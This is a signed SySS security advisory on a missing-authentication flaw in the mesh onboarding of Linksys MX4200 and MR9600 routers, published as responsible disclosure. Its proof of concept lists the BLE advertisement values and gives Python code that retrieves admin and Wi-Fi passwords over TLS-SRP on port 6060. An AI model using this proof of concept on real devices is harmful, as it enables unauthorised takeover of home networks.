-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-002
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s):         1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type:        Missing Authentication for Critical Function (CWE-306)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             CVE-2026-27846
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:
 
Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to missing authentication, a user with physical access to the device
can misuse the mesh functionality to add a new mesh device to the network
to gain access to sensitive information, including the password for admin
access to the web interface and the Wi-Fi passwords.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Vulnerability Details:

The Linksys MX4200 (and other models) provides the functionality to add
other devices to the mesh network. One method to add such a device uses
a Bluetooth connection initiated by pressing the reset button quickly
five times.

This makes the router search for nearby Bluetooth Low Energy (BLE) devices
with specific services and characteristics. After such a device is found,
the router will connect to it and send credentials for a hidden Wi-Fi
network as well as a TLS-SRP username and password. This information
can be used to connect to the hidden Wi-Fi and a service running on TCP
port 6060, which accepts a TLS-SRP connection using the given
credentials.

By sending a binary hello message, followed by a so-called "sync request",
the service will answer with sensitive data, including the password for
admin access to the web interface and the Wi-Fi passwords.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Proof of Concept (PoC):

To be recognized as a Linksys mesh device over BLE, the correct data has
to be advertised. This includes the following:

  - Flags: 0x06
  - Manufacturer specific data: 0x5C00 0x0000
  - Complete list of service class UUIDS: 00002080-8eab-46c2-b788-0e9440016fd1
  - Complete local name: Linksys

Additionally, the following service has to be present with the specified 
characteristics:

  Service UUID: 00002080-8eab-46c2-b788-0e9440016fd1

  Characteristics 1:
    UUID: 00002081-8eab-46c2-b788-0e9440016fd1
    Properties: READ, WRITE, NOTIFY
    Permissions: READABLE, WRITABLE

  Characteristics 2:
    UUID: 00002082-8eab-46c2-b788-0e9440016fd1
    Properties: READ, WRITE, NOTIFY
    Permissions: READABLE, WRITABLE

After the reset button on the MX4200 is pressed quickly five times,
it will connect to the advertising device and write the data containing
the SSID and passphrase of the hidden Wi-Fi network as well as the
TLS-SRP username and password into the second characteristic.

After this data is received and a Wi-Fi connection to the hidden
network is established, the following Python code, using the 
"tlslite-ng" library, can be used to connect to the service running on
TCP port 6060 and to send the sync request:

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.connect(("192.168.1.1", 6060))

  conn = TLSConnection(sock)
  conn.handshakeClientSRP(srp_username, srp_pass)

  conn.sendall(bytes.fromhex("4f53435479e0b43120fcf435000000600000"))
  conn.sendall('{"version": "0.1", "type": "sync_request", "client_id": "FBFA9E31-BE8C-4B63-A0BE-E89F80B304EA"}'.encode('utf8'))

  data = ""
  msg = connection.recv(1024)
  while msg:
      data = data + msg.hex()
      msg = connection.recv(1024)

  data = bytes.fromhex(data[36:-2])
  data = data.decode("utf8")
  json_data = json.loads(data)
  print(json.dumps(json_data, indent=2))

The returned data is shown in the following:

  {
    "ADMIN": {
      "syscfg": [
        {
          "device::admin_password": "AdminPassword+1"
        }
      ],
      [...]
    },
    "WLAN": {
      "syscfg": [
        {
          "device::wps_pin": "63091700"
        },
        [...]
        {
          "wl0_passphrase": "WiFiPassword"
        },
        {
          "wl0_security_mode": "wpa2-personal"
        },
        {
          "wl0_ssid": "LinksysRD"
        },
        [...]
      ],
    },
    [...]
  }

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Solution:
 
There is no known solution yet.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Disclosure Timeline:
 
2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2025-06-24: Manufacturer information: vulnerability will not receive fix
2026-02-12: Public disclosure
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
References:
 
[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-002
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-002.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Disclaimer:
 
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Copyright:
 
Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEUdRumzwpc0esAQ9aewDRZKMvmskFAmmezC8ACgkQewDRZKMv
msmdaxAAjzwtA45VW1PuD5XWUgpsAxeOqW68NUqWKKfnRSwfH3IVPNc3yrH2ufyd
FTvpvw33+aFN0OalVnr+ibP9A9p87x4/ltep2sQumbCoRGAE6T8eBn2LumUdJ0Bq
NWwu7ADp1ah40DsNl3pBD2Y114BnvCP1y4vOCIRDVXB8UnhNP0lldH16wHFn8CTH
f6OBqAaUo3K5t1D2XYx4MjlQ49gMsslJyK80IeSG2NWtgYz1vCGKXo6aYyccxi/N
5lj8c65vORsdcGTE82g3JeWySInqMWYD2/wBqspMtCQlSECksuU+XDhqRvyIdEMj
9cv+MYf4+J9/8/lNCiCirhRkopCqitT0l5grOGqCLVe/aKQvSaaICxGg1MIAshkr
6ZHw1js3leSJjAgg/hr/jR6lCDQnw5ZvJKXdqfBZet7Fn80Hn/rzXx63p4vvwgf3
ta932PtebKdtgLs01dNb65w5X0Sm7HalaIkwlE8s0ok6IdF+WmMFAXV++8eHWgZF
lpgDzTQcuvlcW37iJtWmZW/jvcGztvpejBLgMJeJB6zw5Ra/X7+5JnUqInaz3Wuo
c3KihqpbZFApV6y2xgzupm1tNh1139w+rtK4LhpO0dlzLS/AGDKI4bIsbkVGg3oH
Pu+rB7hIOQORYPH8cuouwxw8UWYySrSvWT031HEHN48hJ3m6X1c=
=xxpW
-----END PGP SIGNATURE-----